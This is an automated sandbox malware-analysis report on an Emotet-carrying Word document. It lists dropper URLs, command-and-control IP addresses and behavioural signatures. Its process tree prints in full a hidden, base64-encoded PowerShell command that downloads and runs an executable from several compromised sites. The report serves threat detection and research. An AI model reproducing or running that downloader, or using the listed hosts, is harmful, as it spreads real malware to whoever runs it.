Analysis

  • max time kernel
    25s
  • resource
    win10v191014
  • submitted
    16-01-2020 03:25

General

  • Target

    881b837b4f8b743627ade4703cf5e6fb97eeb788212f253c65db3ed2d097375f

  • Sample

    200116-n9ymfpgsms

  • SHA256

    881b837b4f8b743627ade4703cf5e6fb97eeb788212f253c65db3ed2d097375f

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://iihttanzania.com/wp-admin/N8CWI/

exe.dropper

http://fdhk.net/plugins/8xshhk/

exe.dropper

http://pmvraetsel.newsoftdemo.info/wp-admin/pyUl573/

exe.dropper

http://realizaweb.site/cgi-bin/AbeNM155769/

exe.dropper

http://rochun.org/error/7WJ1/

Extracted

Family

emotet

C2

73.239.11.159:80

82.152.149.79:80

83.35.213.87:7080

192.241.143.52:8080

159.65.241.220:8080

45.79.95.107:443

69.163.33.84:8080

94.200.126.42:80

190.186.164.23:80

68.187.160.28:443

185.86.148.222:8080

177.242.21.126:80

203.25.159.3:8080

46.101.212.195:8080

189.26.118.194:80

110.142.161.90:443

45.8.136.201:80

97.120.32.227:80

181.129.96.162:990

5.196.35.138:7080

rsa_pubkey.plain

Signatures

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\881b837b4f8b743627ade4703cf5e6fb97eeb788212f253c65db3ed2d097375f.doc" /o ""
    1⤵
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    • Checks processor information in registry
    • Suspicious behavior: AddClipboardFormatListener
    PID:4932
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABKAG8AbgBiAGUAaABvAG0AaQB3AHQAPQAnAFIAcABzAGoAZgB6AHoAYwBlAGUAJwA7ACQASgBxAGkAcQByAGQAeQB3AGUAcgBlAGoAdgAgAD0AIAAnADkAMwAzACcAOwAkAFYAcAByAHkAagBhAHUAdwBlAHoAdgBnAD0AJwBWAGUAegB0AHkAdwBuAGUAcAB6AHYAJwA7ACQAUwB1AGkAZAB0AHYAYwBrAG4AbwBpAGgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEoAcQBpAHEAcgBkAHkAdwBlAHIAZQBqAHYAKwAnAC4AZQB4AGUAJwA7ACQASQBtAGUAawBvAGkAbABtAHkAdgBrAG0AcwA9ACcATQBxAHcAZABqAGsAZAB5AGYAawBhACcAOwAkAEIAaQBzAHcAcQBxAHEAaAB3AGoAZAB5AD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAVAAuAHcARQBCAEMATABJAGUATgB0ADsAJABJAHYAbQBxAHAAaQB2AGYAPQAnAGgAdAB0AHAAOgAvAC8AaQBpAGgAdAB0AGEAbgB6AGEAbgBpAGEALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAE4AOABDAFcASQAvACoAaAB0AHQAcAA6AC8ALwBmAGQAaABrAC4AbgBlAHQALwBwAGwAdQBnAGkAbgBzAC8AOAB4AHMAaABoAGsALwAqAGgAdAB0AHAAOgAvAC8AcABtAHYAcgBhAGUAdABzAGUAbAAuAG4AZQB3AHMAbwBmAHQAZABlAG0AbwAuAGkAbgBmAG8ALwB3AHAALQBhAGQAbQBpAG4ALwBwAHkAVQBsADUANwAzAC8AKgBoAHQAdABwADoALwAvAHIAZQBhAGwAaQB6AGEAdwBlAGIALgBzAGkAdABlAC8AYwBnAGkALQBiAGkAbgAvAEEAYgBlAE4ATQAxADUANQA3ADYAOQAvACoAaAB0AHQAcAA6AC8ALwByAG8AYwBoAHUAbgAuAG8AcgBnAC8AZQByAHIAbwByAC8ANwBXAEoAMQAvACcALgAiAFMAUABsAGAAaQBUACIAKAAnACoAJwApADsAJABRAGEAcwBkAGcAZQBtAGsAYQA9ACcAWQBrAGMAeABpAHAAZwBmAGwAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFIAZwB2AGoAdABuAHUAcAAgAGkAbgAgACQASQB2AG0AcQBwAGkAdgBmACkAewB0AHIAeQB7ACQAQgBpAHMAdwBxAHEAcQBoAHcAagBkAHkALgAiAGQAbwB3AE4ATABPAGAAQQBgAGQARgBJAGAATABFACIAKAAkAFIAZwB2AGoAdABuAHUAcAAsACAAJABTAHUAaQBkAHQAdgBjAGsAbgBvAGkAaAApADsAJABZAGMAcwB0AGwAZQBvAHoAegBvAGwAZgA9ACcARABoAGcAbwB6AGQAbQBiAHAAZQB5AGkAZwAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAFMAdQBpAGQAdAB2AGMAawBuAG8AaQBoACkALgAiAGwARQBOAEcAYABUAGgAIgAgAC0AZwBlACAAMwAyADAAMQA5ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAdABBAGAAUgBUACIAKAAkAFMAdQBpAGQAdAB2AGMAawBuAG8AaQBoACkAOwAkAFUAbABnAHkAYgBwAGsAbQB0AD0AJwBCAHAAcgBtAGYAZwB5AGUAaABhAHIAbQB2ACcAOwBiAHIAZQBhAGsAOwAkAE0AbgB2AGMAeQB5AGkAdQB1AGEAeQB3AHgAPQAnAFQAdQByAGgAawBsAHgAcgBzAGMAaABrAGkAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgBrAHMAZABjAHcAcgByAD0AJwBTAHUAeABtAGcAagBiAHEAawBnAHcAdQBvACcA
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3020
    • C:\Users\Admin\933.exe
      "C:\Users\Admin\933.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:4716
      • C:\Users\Admin\933.exe
        --ae32f2d7
        3⤵
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        PID:4388

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4388-11-0x0000000000700000-0x0000000000717000-memory.dmp

    Filesize

    92KB

  • memory/4388-12-0x0000000000400000-0x0000000000485000-memory.dmp

    Filesize

    532KB

  • memory/4716-8-0x0000000002310000-0x0000000002327000-memory.dmp

    Filesize

    92KB